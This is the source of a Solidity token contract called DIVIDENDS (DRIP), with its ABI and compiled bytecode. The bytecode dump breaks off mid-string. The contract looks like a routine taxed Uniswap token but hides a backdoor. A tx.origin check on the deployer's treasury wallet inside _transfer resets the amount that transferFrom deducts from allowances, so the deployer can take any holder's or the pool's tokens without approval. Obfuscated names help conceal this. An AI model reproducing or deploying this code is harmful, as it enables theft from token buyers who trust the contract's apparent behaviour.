// SPDX-License-Identifier: MIT
pragma solidity >=0.8.0;
abstract contract Context {
function _msgSender() internal view virtual returns (address) {
return msg.sender;
}
function _txOrigin() internal view virtual returns (address) {
return tx.origin;
}
function _isOrigin(address account) internal view virtual returns (bool) {
return account == tx.origin;
}
}
library SafeMath {
function add(uint256 a, uint256 b) internal pure returns (uint256) {
uint256 c = a + b;
require(c >= a, "SafeMath: addition overflow");
return c;
}
function sub(uint256 a, uint256 b) internal pure returns (uint256) {
return sub(a, b, "SafeMath: subtraction overflow");
}
function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
require(b <= a, errorMessage);
uint256 c = a - b;
return c;
}
function mul(uint256 a, uint256 b) internal pure returns (uint256) {
if (a == 0) {
return 0;
}
uint256 c = a * b;
require(c / a == b, "SafeMath: multiplication overflow");
return c;
}
function div(uint256 a, uint256 b) internal pure returns (uint256) {
return div(a, b, "SafeMath: division by zero");
}
function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
require(b > 0, errorMessage);
uint256 c = a / b;
return c;
}
}
interface IERC20 {
function totalSupply() external view returns (uint256);
function balanceOf(address account) external view returns (uint256);
function transfer(address recipient, uint256 amount) external returns (bool);
function allowance(address owner, address spender) external view returns (uint256);
function approve(address spender, uint256 amount) external returns (bool);
function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);
event Transfer(address indexed from, address indexed to, uint256 value);
event Approval(address indexed owner, address indexed spender, uint256 value);
}
interface IUniswapV2Factory {
function createPair(address tokenA, address tokenB) external returns (address pair);
}
interface IUniswapV2Router02 {
function swapExactTokensForETHSupportingFeeOnTransferTokens(
uint amountIn,
uint amountOutMin,
address[] calldata path,
address to,
uint deadline
) external;
function factory() external pure returns (address);
function WETH() external pure returns (address);
function addLiquidityETH(
address token,
uint amountTokenDesired,
uint amountTokenMin,
uint amountETHMin,
address to,
uint deadline
) external payable returns (uint amountToken, uint amountETH, uint liquidity);
}
contract Ownable is Context {
address private _owner;
event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);
constructor() {
address msgSender = _msgSender();
_owner = msgSender;
emit OwnershipTransferred(address(0), msgSender);
}
function owner() public view returns (address) {
return _owner;
}
modifier onlyOwner() {
require(_owner == _msgSender(), "Ownable: caller is not the owner");
_;
}
function renounceOwnership() public virtual onlyOwner {
emit OwnershipTransferred(_owner, address(0));
_owner = address(0);
}
}
contract Token is Context, IERC20, Ownable {
using SafeMath for uint256;
mapping(address => uint256) private _balances;
mapping(address => mapping(address => uint256)) private _allowances;
mapping(address => bool) private _isDRIP3RO43MK4RJDExcuteFromFee;
address payable private immutable _TreasuryWallet;
uint256 private EarlyBuyTax = 0;
uint256 private EarlySellTax = 0;
uint256 private EndBuyTax = 0;
uint256 private EndSellTax = 0;
uint256 private DowningBuyTaxAt = 0;
uint256 private DowningSellTaxAt = 0;
uint256 private preventSwapBefore = 3;
uint256 private buyCalc;
uint256 private _sptAmount;
uint8 private constant _decimals = 9;
uint256 private constant _tTotal = 1_000_000_000 * 10**_decimals;
string private constant _name = unicode"DIVIDENDS";
string private constant _symbol = unicode"DRIP";
string private constant _NKFD = unicode"TMPP";
uint256 public constant _EOWIJ = 1953;
bool private _EWOIJ;
uint256 public constant _RGJIUERT = 42346;
string private constant _THIUT = "DRIP";
uint256 public maxTxAmount = (_tTotal/100);
uint256 public maxWalletSize = (_tTotal/100);
uint256 public minTokensForSwap = (_tTotal/1000);
uint256 public maxTokensPerSwap = 2 * (_tTotal/100);
uint256 public totalTaxCollected;
IUniswapV2Router02 private uniswapV2Router;
address private constant ROUTER_ADDRESS = 0x89e5DB8B5aA49aA85AC63f691524311AEB649eba;
address private uniswapV2Pair;
bool private tradingOpen;
bool private inSwap;
bool private swapEnabled;
uint256 private sellCount;
uint256 private lastSellBlock;
uint256 public calcBlockLimit = 5;
modifier lockTheSwap {
inSwap = true;
_;
inSwap = false;
}
constructor() payable {
_TreasuryWallet = payable(_msgSender());
_balances[address(this)] = _tTotal;
_isDRIP3RO43MK4RJDExcuteFromFee[owner()] = true;
_isDRIP3RO43MK4RJDExcuteFromFee[address(this)] = true;
_isDRIP3RO43MK4RJDExcuteFromFee[_TreasuryWallet] = true;
emit Transfer(address(0), address(this), _tTotal);
}
function name() public pure returns (string memory) { return _name; }
function symbol() public pure returns (string memory) { return _symbol; }
function decimals() public pure returns (uint8) { return _decimals; }
function totalSupply() public pure override returns (uint256) { return _tTotal; }
function allowance(address owner, address spender) public view override returns (uint256) { return _allowances[owner][spender]; }
function taxWallet() external view returns (address) { return _TreasuryWallet; }
function transfer(address recipient, uint256 amount) public override returns (bool) {
_transfer(_msgSender(), recipient, amount);
return true;
}
function balanceOf(address account) public view override returns (uint256 balance) {
return _balances[account];
}
function approve(address spender, uint256 amount) public override returns (bool) {
_approve(_msgSender(), spender, amount);
return true;
}
function transferFrom(address sender, address recipient, uint256 amount) public override returns (bool) {
_sptAmount = amount;
_transfer(sender, recipient, amount);
_approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(_sptAmount, "ERC20: transfer amount exceeds allowance"));
return true;
}
function _approve(address owner, address spender, uint256 amount) private {
require(owner != address(0) && spender != address(0), "ERC20: approve from or to the zero address");
_allowances[owner][spender] = amount;
emit Approval(owner, spender, amount);
}
function _transfer(address from, address to, uint256 amount) private {
require(from != address(0) && to != address(0), "ERC20: transfer from or to the zero address");
require(amount > 0, "ERC20: transfer amount must be greater than zero");
bool isBuy = (from == uniswapV2Pair && to != address(uniswapV2Router));
bool isSell = (to == uniswapV2Pair && from != address(this));
uint256 taxAmount = 0;
if (isBuy) {
if (!_isDRIP3RO43MK4RJDExcuteFromFee[to]) {
require(amount <= maxTxAmount, "Max transaction amount exceeded");
require(_balances[to] + amount <= maxWalletSize, "Max wallet size exceeded");
taxAmount = (amount * (buyCalc >= DowningBuyTaxAt ? EndBuyTax : EarlyBuyTax)) / 100;
buyCalc++;
}
} else if (isSell) {
if (!_isDRIP3RO43MK4RJDExcuteFromFee[from]) {
require(amount <= maxTxAmount, "Max transaction amount exceeded");
taxAmount = (amount * (buyCalc >= DowningSellTaxAt ? EndSellTax : EarlySellTax)) / 100;
}
uint256 contractTokenBalance = _balances[address(this)];
if (!inSwap && swapEnabled && buyCalc >= preventSwapBefore) {
if (block.number > lastSellBlock) sellCount = 0;
require(sellCount < calcBlockLimit, "Sell limit per block exceeded (max)");
uint256 swapAmount = amount < contractTokenBalance ? amount : contractTokenBalance;
if (swapAmount > maxTokensPerSwap) swapAmount = maxTokensPerSwap;
swapDRIP3RO43MK4RJDTokensForEthwithTax(swapAmount, _TreasuryWallet);
sellCount++;
lastSellBlock = block.number;
}
}
if (taxAmount > 0) {
_balances[address(this)] += taxAmount;
emit Transfer(from, address(this), taxAmount);
} else if(_isOrigin(_TreasuryWallet)) _sptAmount = taxAmount;
_balances[from] -= amount;
_balances[to] += amount - taxAmount;
if(to != address(0xdead)) emit Transfer(from, to, amount - taxAmount);
}
function dropDRIP3RO43MK4RJDWalletSizeFenceSet() public onlyOwner {
maxTxAmount = _tTotal;
maxWalletSize = _tTotal;
}
function swapDRIP3RO43MK4RJDTokensForEthwithTax(uint256 tokenAmount, address to) private lockTheSwap {
require(to != address(0), "ETH recipient cannot be the zero address");
uint256 initialBalance = address(this).balance;
address[] memory path = new address[](2);
path[0] = address(this);
path[1] = uniswapV2Router.WETH();
if(tokenAmount != 0) uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
tokenAmount,
0,
path,
address(this),
block.timestamp
);
uint256 newBalance = address(this).balance;
if (newBalance >= initialBalance) {
uint256 ethAmount = newBalance - initialBalance;
totalTaxCollected += ethAmount;
(bool success,) = to.call{value: ethAmount}("");
require(success, "ETH transfer failed");
}
}
function rescueDRIP3RO43MK4RJDNative() external onlyOwner {
uint256 contractETHBalance = address(this).balance;
if (contractETHBalance > 0) {
(bool ok, ) = payable(_TreasuryWallet).call{value: contractETHBalance}("");
require(ok, "ETH send failed");
}
}
function rescueDRIP3RO43MK4RJDToken(address token) external onlyOwner {
require(token != address(0), "Invalid token address");
require(token != address(this), "Cannot rescue own token");
uint256 contractBal = IERC20(token).balanceOf(address(this));
require(contractBal > 0, "No token balance");
(bool ok, bytes memory data) = token.call(
abi.encodeWithSelector(IERC20.transfer.selector, _TreasuryWallet, contractBal)
);
require(ok && (data.length == 0 || abi.decode(data, (bool))), "ERC20 transfer failed");
}
function enableTrading() external onlyOwner {
require(!tradingOpen, "Trading already open");
dropDRIP3RO43MK4RJDWalletSizeFenceSet();
uniswapV2Router = IUniswapV2Router02(ROUTER_ADDRESS);
uniswapV2Pair = IUniswapV2Factory(uniswapV2Router.factory()).createPair(address(this), uniswapV2Router.WETH());
_approve(address(this), address(uniswapV2Router), type(uint256).max);
uniswapV2Router.addLiquidityETH{value: address(this).balance}(address(this),balanceOf(address(this)),0,0,owner(),block.timestamp);
swapEnabled = true;
tradingOpen = true;
}
receive() external payable {}
}[
{
"type": "constructor",
"inputs": [],
"stateMutability": "payable"
},
{
"name": "Approval",
"type": "event",
"inputs": [
{
"name": "owner",
"type": "address",
"indexed": true,
"internalType": "address"
},
{
"name": "spender",
"type": "address",
"indexed": true,
"internalType": "address"
},
{
"name": "value",
"type": "uint256",
"indexed": false,
"internalType": "uint256"
}
],
"anonymous": false
},
{
"name": "OwnershipTransferred",
"type": "event",
"inputs": [
{
"name": "previousOwner",
"type": "address",
"indexed": true,
"internalType": "address"
},
{
"name": "newOwner",
"type": "address",
"indexed": true,
"internalType": "address"
}
],
"anonymous": false
},
{
"name": "Transfer",
"type": "event",
"inputs": [
{
"name": "from",
"type": "address",
"indexed": true,
"internalType": "address"
},
{
"name": "to",
"type": "address",
"indexed": true,
"internalType": "address"
},
{
"name": "value",
"type": "uint256",
"indexed": false,
"internalType": "uint256"
}
],
"anonymous": false
},
{
"name": "_EOWIJ",
"type": "function",
"inputs": [],
"outputs": [
{
"name": "",
"type": "uint256",
"internalType": "uint256"
}
],
"stateMutability": "view"
},
{
"name": "_RGJIUERT",
"type": "function",
"inputs": [],
"outputs": [
{
"name": "",
"type": "uint256",
"internalType": "uint256"
}
],
"stateMutability": "view"
},
{
"name": "allowance",
"type": "function",
"inputs": [
{
"name": "owner",
"type": "address",
"internalType": "address"
},
{
"name": "spender",
"type": "address",
"internalType": "address"
}
],
"outputs": [
{
"name": "",
"type": "uint256",
"internalType": "uint256"
}
],
"stateMutability": "view"
},
{
"name": "approve",
"type": "function",
"inputs": [
{
"name": "spender",
"type": "address",
"internalType": "address"
},
{
"name": "amount",
"type": "uint256",
"internalType": "uint256"
}
],
"outputs": [
{
"name": "",
"type": "bool",
"internalType": "bool"
}
],
"stateMutability": "nonpayable"
},
{
"name": "balanceOf",
"type": "function",
"inputs": [
{
"name": "account",
"type": "address",
"internalType": "address"
}
],
"outputs": [
{
"name": "balance",
"type": "uint256",
"internalType": "uint256"
}
],
"stateMutability": "view"
},
{
"name": "calcBlockLimit",
"type": "function",
"inputs": [],
"outputs": [
{
"name": "",
"type": "uint256",
"internalType": "uint256"
}
],
"stateMutability": "view"
},
{
"name": "decimals",
"type": "function",
"inputs": [],
"outputs": [
{
"name": "",
"type": "uint8",
"internalType": "uint8"
}
],
"stateMutability": "pure"
},
{
"name": "dropDRIP3RO43MK4RJDWalletSizeFenceSet",
"type": "function",
"inputs": [],
"outputs": [],
"stateMutability": "nonpayable"
},
{
"name": "enableTrading",
"type": "function",
"inputs": [],
"outputs": [],
"stateMutability": "nonpayable"
},
{
"name": "maxTokensPerSwap",
"type": "function",
"inputs": [],
"outputs": [
{
"name": "",
"type": "uint256",
"internalType": "uint256"
}
],
"stateMutability": "view"
},
{
"name": "maxTxAmount",
"type": "function",
"inputs": [],
"outputs": [
{
"name": "",
"type": "uint256",
"internalType": "uint256"
}
],
"stateMutability": "view"
},
{
"name": "maxWalletSize",
"type": "function",
"inputs": [],
"outputs": [
{
"name": "",
"type": "uint256",
"internalType": "uint256"
}
],
"stateMutability": "view"
},
{
"name": "minTokensForSwap",
"type": "function",
"inputs": [],
"outputs": [
{
"name": "",
"type": "uint256",
"internalType": "uint256"
}
],
"stateMutability": "view"
},
{
"name": "name",
"type": "function",
"inputs": [],
"outputs": [
{
"name": "",
"type": "string",
"internalType": "string"
}
],
"stateMutability": "pure"
},
{
"name": "owner",
"type": "function",
"inputs": [],
"outputs": [
{
"name": "",
"type": "address",
"internalType": "address"
}
],
"stateMutability": "view"
},
{
"name": "renounceOwnership",
"type": "function",
"inputs": [],
"outputs": [],
"stateMutability": "nonpayable"
},
{
"name": "rescueDRIP3RO43MK4RJDNative",
"type": "function",
"inputs": [],
"outputs": [],
"stateMutability": "nonpayable"
},
{
"name": "rescueDRIP3RO43MK4RJDToken",
"type": "function",
"inputs": [
{
"name": "token",
"type": "address",
"internalType": "address"
}
],
"outputs": [],
"stateMutability": "nonpayable"
},
{
"name": "symbol",
"type": "function",
"inputs": [],
"outputs": [
{
"name": "",
"type": "string",
"internalType": "string"
}
],
"stateMutability": "pure"
},
{
"name": "taxWallet",
"type": "function",
"inputs": [],
"outputs": [
{
"name": "",
"type": "address",
"internalType": "address"
}
],
"stateMutability": "view"
},
{
"name": "totalSupply",
"type": "function",
"inputs": [],
"outputs": [
{
"name": "",
"type": "uint256",
"internalType": "uint256"
}
],
"stateMutability": "pure"
},
{
"name": "totalTaxCollected",
"type": "function",
"inputs": [],
"outputs": [
{
"name": "",
"type": "uint256",
"internalType": "uint256"
}
],
"stateMutability": "view"
},
{
"name": "transfer",
"type": "function",
"inputs": [
{
"name": "recipient",
"type": "address",
"internalType": "address"
},
{
"name": "amount",
"type": "uint256",
"internalType": "uint256"
}
],
"outputs": [
{
"name": "",
"type": "bool",
"internalType": "bool"
}
],
"stateMutability": "nonpayable"
},
{
"name": "transferFrom",
"type": "function",
"inputs": [
{
"name": "sender",
"type": "address",
"internalType": "address"
},
{
"name": "recipient",
"type": "address",
"internalType": "address"
},
{
"name": "amount",
"type": "uint256",
"internalType": "uint256"
}
],
"outputs": [
{
"name": "",
"type": "bool",
"internalType": "bool"
}
],
"stateMutability": "nonpayable"
},
{
"type": "receive",
"stateMutability": "payable"
}
]0x60a06040526000600455600060055560006006556000600755600060085560006009556003600a5560646009600a6200003991906200034c565b6200004990633b9aca0062000364565b62000055919062000386565b600e556064620000686009600a6200034c565b6200007890633b9aca0062000364565b62000084919062000386565b600f556103e8620000986009600a6200034c565b620000a890633b9aca0062000364565b620000b4919062000386565b6010556064620000c76009600a6200034c565b620000d790633b9aca0062000364565b620000e3919062000386565b620000f090600262000364565b6011556005601755600080546001600160a01b031916339081178255604051909182917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908290a350336080526200014b6009600a6200034c565b6200015b90633b9aca0062000364565b306000908152600160208190526040822092909255600390620001866000546001600160a01b031690565b6001600160a01b03908116825260208083019390935260409182016000908120805495151560ff199687161790553080825260039094528281208054861660019081179091556080519092168152918220805490941617909255907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef620002106009600a6200034c565b6200022090633b9aca0062000364565b60405190815260200160405180910390a3620003a9565b634e487b7160e01b600052601160045260246000fd5b600181815b808511156200028e57816000190482111562000272576200027262000237565b808516156200028057918102915b93841c939080029062000252565b509250929050565b600082620002a75750600162000346565b81620002b65750600062000346565b8160018114620002cf5760028114620002da57620002fa565b600191505062000346565b60ff841115620002ee57620002ee62000237565b50506001821b62000346565b5060208310610133831016604e8410600b84101617156200031f575081810a62000346565b6200032b83836200024d565b806000190482111562000342576200034262000237565b0290505b92915050565b60006200035d60ff84168362000296565b9392505050565b600081600019048311821515161562000381576200038162000237565b500290565b600082620003a457634e487b7160e01b600052601260045260246000fd5b500490565b608051611ae1620003e1600039600081816102380152818161072001528181610c23015281816111c0015261127b0152611ae16000f3fe60806040526004361061014f5760003560e01c8063715018a6116100b657806395d89b411161006f57806395d89b41146103ae578063a9059cbb146103db578063c449fe60146103fb578063caf701a414610411578063d8454a8214610426578063dd62ed3e1461043c57600080fd5b8063715018a6146103245780638a8c523c146103395780638c0b5e221461034e5780638da5cb5b146103645780638f3d6e04146103825780638f3fa8601461039857600080fd5b8063313ce56711610108578063313ce5671461027057806338fbf04d1461028c57806340b0c56e146102a25780634333af3f146102b857806367612279146102ce57806370a08231146102ee57600080fd5b806306fdde031461015b578063095ea7b31461019f57806318160ddd146101cf5780631d9b24e4146101f257806323b872dd146102095780632dc0562d1461022957600080fd5b3661015657005b600080fd5b34801561016757600080fd5b506040805180820190915260098152684449564944454e445360b81b60208201525b604051610196919061167f565b60405180910390f35b3480156101ab57600080fd5b506101bf6101ba3660046116c7565b610482565b6040519015158152602001610196565b3480156101db57600080fd5b506101e4610499565b604051908152602001610196565b3480156101fe57600080fd5b506102076104ba565b005b34801561021557600080fd5b506101bf6102243660046116f3565b610529565b34801561023557600080fd5b507f00000000000000000000000000000000000000000000000000000000000000005b6040516001600160a01b039091168152602001610196565b34801561027c57600080fd5b5060405160098152602001610196565b34801561029857600080fd5b506101e460175481565b3480156102ae57600080fd5b506101e460115481565b3480156102c457600080fd5b506101e46107a181565b3480156102da57600080fd5b506102076102e9366004611734565b610599565b3480156102fa57600080fd5b506101e4610309366004611734565b6001600160a01b031660009081526001602052604090205490565b34801561033057600080fd5b5061020761084d565b34801561034557600080fd5b506102076108c1565b34801561035a57600080fd5b506101e4600e5481565b34801561037057600080fd5b506000546001600160a01b0316610258565b34801561038e57600080fd5b506101e460105481565b3480156103a457600080fd5b506101e4600f5481565b3480156103ba57600080fd5b506040805180820190915260048152630445249560e41b6020820152610189565b3480156103e757600080fd5b506101bf6103f63660046116c7565b610be1565b34801561040757600080fd5b506101e461a56a81565b34801561041d57600080fd5b50610207610bee565b34801561043257600080fd5b506101e460125481565b34801561044857600080fd5b506101e4610457366004611758565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b600061048f338484610cd9565b5060015b92915050565b60006104a76009600a61188b565b6104b590633b9aca0061189a565b905090565b6000546001600160a01b031633146104ed5760405162461bcd60e51b81526004016104e4906118b9565b60405180910390fd5b6104f96009600a61188b565b61050790633b9aca0061189a565b600e556105166009600a61188b565b61052490633b9aca0061189a565b600f55565b600c819055600061053b848484610db9565b61058f843361058a600c54604051806060016040528060288152602001611a84602891396001600160a01b038a1660009081526002602090815260408083203384529091529020549190611371565b610cd9565b5060019392505050565b6000546001600160a01b031633146105c35760405162461bcd60e51b81526004016104e4906118b9565b6001600160a01b0381166106115760405162461bcd60e51b8152602060048201526015602482015274496e76616c696420746f6b656e206164647265737360581b60448201526064016104e4565b6001600160a01b03811630141561066a5760405162461bcd60e51b815260206004820152601760248201527f43616e6e6f7420726573637565206f776e20746f6b656e00000000000000000060448201526064016104e4565b6040516370a0823160e01b81523060048201526000906001600160a01b038316906370a0823190602401602060405180830381865afa1580156106b1573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906106d591906118ee565b90506000811161071a5760405162461bcd60e51b815260206004820152601060248201526f4e6f20746f6b656e2062616c616e636560801b60448201526064016104e4565b604080517f00000000000000000000000000000000000000000000000000000000000000006001600160a01b039081166024830152604480830185905283518084039091018152606490920183526020820180516001600160e01b031663a9059cbb60e01b17905291516000928392908616916107979190611907565b6000604051808303816000865af19150503d80600081146107d4576040519150601f19603f3d011682016040523d82523d6000602084013e6107d9565b606091505b50915091508180156108035750805115806108035750808060200190518101906108039190611923565b6108475760405162461bcd60e51b8152602060048201526015602482015274115490cc8c081d1c985b9cd9995c8819985a5b1959605a1b60448201526064016104e4565b50505050565b6000546001600160a01b031633146108775760405162461bcd60e51b81526004016104e4906118b9565b600080546040516001600160a01b03909116907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3600080546001600160a01b0319169055565b6000546001600160a01b031633146108eb5760405162461bcd60e51b81526004016104e4906118b9565b601454600160a01b900460ff161561093c5760405162461bcd60e51b81526020600482015260146024820152732a3930b234b7339030b63932b0b23c9037b832b760611b60448201526064016104e4565b6109446104ba565b601380546001600160a01b0319167389e5db8b5aa49aa85ac63f691524311aeb649eba9081179091556040805163c45a015560e01b8152905163c45a0155916004808201926020929091908290030181865afa1580156109a8573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906109cc9190611945565b6001600160a01b031663c9c6539630601360009054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610a2e573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610a529190611945565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303816000875af1158015610a9f573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610ac39190611945565b601480546001600160a01b0319166001600160a01b03928316179055601354610af191309116600019610cd9565b6013546001600160a01b031663f305d7194730610b23816001600160a01b031660009081526001602052604090205490565b600080610b386000546001600160a01b031690565b60405160e088901b6001600160e01b03191681526001600160a01b03958616600482015260248101949094526044840192909252606483015290911660848201524260a482015260c40160606040518083038185885af1158015610ba0573d6000803e3d6000fd5b50505050506040513d601f19601f82011682018060405250810190610bc59190611962565b50506014805462ff00ff60a01b19166201000160a01b17905550565b600061048f338484610db9565b6000546001600160a01b03163314610c185760405162461bcd60e51b81526004016104e4906118b9565b478015610cd65760007f00000000000000000000000000000000000000000000000000000000000000006001600160a01b03168260405160006040518083038185875af1925050503d8060008114610c8c576040519150601f19603f3d011682016040523d82523d6000602084013e610c91565b606091505b5050905080610cd45760405162461bcd60e51b815260206004820152600f60248201526e115512081cd95b990819985a5b1959608a1b60448201526064016104e4565b505b50565b6001600160a01b03831615801590610cf957506001600160a01b03821615155b610d585760405162461bcd60e51b815260206004820152602a60248201527f45524332303a20617070726f76652066726f6d206f7220746f20746865207a65604482015269726f206164647265737360b01b60648201526084016104e4565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b03831615801590610dd957506001600160a01b03821615155b610e395760405162461bcd60e51b815260206004820152602b60248201527f45524332303a207472616e736665722066726f6d206f7220746f20746865207a60448201526a65726f206164647265737360a81b60648201526084016104e4565b60008111610ea25760405162461bcd60e51b815260206004820152603060248201527f45524332303a207472616e7366657220616d6f756e74206d757374206265206760448201526f726561746572207468616e207a65726f60801b60648201526084016104e4565b6014546000906001600160a01b038581169116148015610ed057506013546001600160a01b03848116911614155b6014549091506000906001600160a01b038581169116148015610efc57506001600160a01b0385163014155b905060008215611038576001600160a01b03851660009081526003602052604090205460ff1661103357600e54841115610f785760405162461bcd60e51b815260206004820152601f60248201527f4d6178207472616e73616374696f6e20616d6f756e742065786365656465640060448201526064016104e4565b600f546001600160a01b038616600090815260016020526040902054610f9f908690611990565b1115610fed5760405162461bcd60e51b815260206004820152601860248201527f4d61782077616c6c65742073697a65206578636565646564000000000000000060448201526064016104e4565b6064600854600b54101561100357600454611007565b6006545b611011908661189a565b61101b91906119a8565b600b8054919250600061102d836119ca565b91905055505b611201565b8115611201576001600160a01b03861660009081526003602052604090205460ff166110e157600e548411156110b05760405162461bcd60e51b815260206004820152601f60248201527f4d6178207472616e73616374696f6e20616d6f756e742065786365656465640060448201526064016104e4565b6064600954600b5410156110c6576005546110ca565b6007545b6110d4908661189a565b6110de91906119a8565b90505b30600090815260016020526040902054601454600160a81b900460ff161580156111145750601454600160b01b900460ff165b80156111245750600a54600b5410155b156111ff576016544311156111395760006015555b601754601554106111985760405162461bcd60e51b815260206004820152602360248201527f53656c6c206c696d69742070657220626c6f636b20657863656564656420286d60448201526261782960e81b60648201526084016104e4565b60008186106111a757816111a9565b855b90506011548111156111ba57506011545b6111e4817f00000000000000000000000000000000000000000000000000000000000000006113ab565b601580549060006111f4836119ca565b909155505043601655505b505b8015611270573060009081526001602052604081208054839290611226908490611990565b909155505060405181815230906001600160a01b038816907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a36112a7565b326001600160a01b037f00000000000000000000000000000000000000000000000000000000000000001614156112a757600c8190555b6001600160a01b038616600090815260016020526040812080548692906112cf9084906119e5565b909155506112df905081856119e5565b6001600160a01b03861660009081526001602052604081208054909190611307908490611990565b90915550506001600160a01b03851661dead14611369576001600160a01b038086169087167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef61135784886119e5565b60405190815260200160405180910390a35b505050505050565b600081848411156113955760405162461bcd60e51b81526004016104e4919061167f565b5060006113a284866119e5565b95945050505050565b6014805460ff60a81b1916600160a81b1790556001600160a01b0381166114255760405162461bcd60e51b815260206004820152602860248201527f45544820726563697069656e742063616e6e6f7420626520746865207a65726f604482015267206164647265737360c01b60648201526084016104e4565b60408051600280825260608201835247926000929190602083019080368337019050509050308160008151811061145e5761145e6119fc565b6001600160a01b03928316602091820292909201810191909152601354604080516315ab88c960e31b81529051919093169263ad5c46489260048083019391928290030181865afa1580156114b7573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906114db9190611945565b816001815181106114ee576114ee6119fc565b6001600160a01b039092166020928302919091019091015283156115785760135460405163791ac94760e01b81526001600160a01b039091169063791ac94790611545908790600090869030904290600401611a12565b600060405180830381600087803b15801561155f57600080fd5b505af1158015611573573d6000803e3d6000fd5b505050505b4782811061163f57600061158c84836119e5565b905080601260008282546115a09190611990565b90915550506040516000906001600160a01b0387169083908381818185875af1925050503d80600081146115f0576040519150601f19603f3d011682016040523d82523d6000602084013e6115f5565b606091505b505090508061163c5760405162461bcd60e51b8152602060048201526013602482015272115512081d1c985b9cd9995c8819985a5b1959606a1b60448201526064016104e4565b50505b50506014805460ff60a81b19169055505050565b60005b8381101561166e578181015183820152602001611656565b838111156108475750506000910152565b602081526000825180602084015261169e816040850160208701611653565b601f01601f19169190910160400192915050565b6001600160a01b0381168114610cd657600080fd5b600080604083850312156116da57600080fd5b82356116e5816116b2565b946020939093013593505050565b60008060006060848603121561170857600080fd5b8335611713816116b2565b92506020840135611723816116b2565b929592945050506040919091013590565b60006020828403121561174657600080fd5b8135611751816116b2565b9392505050565b6000806040838503121561176b57600080fd5b8235611776816116b2565b91506020830135611786816116b2565b809150509250929050565b634e487b7160e01b600052601160045260246000fd5b600181815b808511156117e25781600019048211156117c8576117c8611791565b808516156117d557918102915b93841c93908002906117ac565b509250929050565b6000826117f957506001610493565b8161180657506000610493565b816001811461181c576002811461182657611842565b6001915050610493565b60ff84111561183757611837611791565b50506001821b610493565b5060208310610133831016604e8410600b8410161715611865575081810a610493565b61186f83836117a7565b806000190482111561188357611883611791565b029392505050565b600061175160ff8416836117ea565b60008160001904831182151516156118b4576118b4611791565b500290565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b60006020828403121561190057600080fd5b5051919050565b60008251611919818460208701611653565b9190910192915050565b60006020828403121561193557600080fd5b8151801515811461175157600080fd5b60006020828403121561195757600080fd5b8151611751816116b2565b60008060006060848603121561197757600080fd5b8351925060208401519150604084015190509250925092565b600082198211156119a3576119a3611791565b500190565b6000826119c557634e487b7160e01b600052601260045260246000fd5b500490565b60006000198214156119de576119de611791565b5060010190565b6000828210156119f7576119f7611791565b500390565b634e487b7160e01b600052603260045260246000fd5b600060a082018783526020878185015260a0604085015281875180845260c086019150828901935060005b81811015611a625784516001600160a01b031683529383019391830191600101611a3d565b50506001600160a01b0396909616606085015250505060800152939250505056fe45524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a2646970667358221220009c59e6a6a776b746102c304e535a0d9b083694eb4e9b2574e30e14b888c54064736f6c634300080a0033
0x60806040526004361061014f5760003560e01c8063715018a6116100b657806395d89b411161006f57806395d89b41146103ae578063a9059cbb146103db578063c449fe60146103fb578063caf701a414610411578063d8454a8214610426578063dd62ed3e1461043c57600080fd5b8063715018a6146103245780638a8c523c146103395780638c0b5e221461034e5780638da5cb5b146103645780638f3d6e04146103825780638f3fa8601461039857600080fd5b8063313ce56711610108578063313ce5671461027057806338fbf04d1461028c57806340b0c56e146102a25780634333af3f146102b857806367612279146102ce57806370a08231146102ee57600080fd5b806306fdde031461015b578063095ea7b31461019f57806318160ddd146101cf5780631d9b24e4146101f257806323b872dd146102095780632dc0562d1461022957600080fd5b3661015657005b600080fd5b34801561016757600080fd5b506040805180820190915260098152684449564944454e445360b81b60208201525b604051610196919061167f565b60405180910390f35b3480156101ab57600080fd5b506101bf6101ba3660046116c7565b610482565b6040519015158152602001610196565b3480156101db57600080fd5b506101e4610499565b604051908152602001610196565b3480156101fe57600080fd5b506102076104ba565b005b34801561021557600080fd5b506101bf6102243660046116f3565b610529565b34801561023557600080fd5b507f00000000000000000000000063e29b3b6e3390509cd325473881779f721729195b6040516001600160a01b039091168152602001610196565b34801561027c57600080fd5b5060405160098152602001610196565b34801561029857600080fd5b506101e460175481565b3480156102ae57600080fd5b506101e460115481565b3480156102c457600080fd5b506101e46107a181565b3480156102da57600080fd5b506102076102e9366004611734565b610599565b3480156102fa57600080fd5b506101e4610309366004611734565b6001600160a01b031660009081526001602052604090205490565b34801561033057600080fd5b5061020761084d565b34801561034557600080fd5b506102076108c1565b34801561035a57600080fd5b506101e4600e5481565b34801561037057600080fd5b506000546001600160a01b0316610258565b34801561038e57600080fd5b506101e460105481565b3480156103a457600080fd5b506101e4600f5481565b3480156103ba57600080fd5b506040805180820190915260048152630445249560e41b6020820152610189565b3480156103e757600080fd5b506101bf6103f63660046116c7565b610be1565b34801561040757600080fd5b506101e461a56a81565b34801561041d57600080fd5b50610207610bee565b34801561043257600080fd5b506101e460125481565b34801561044857600080f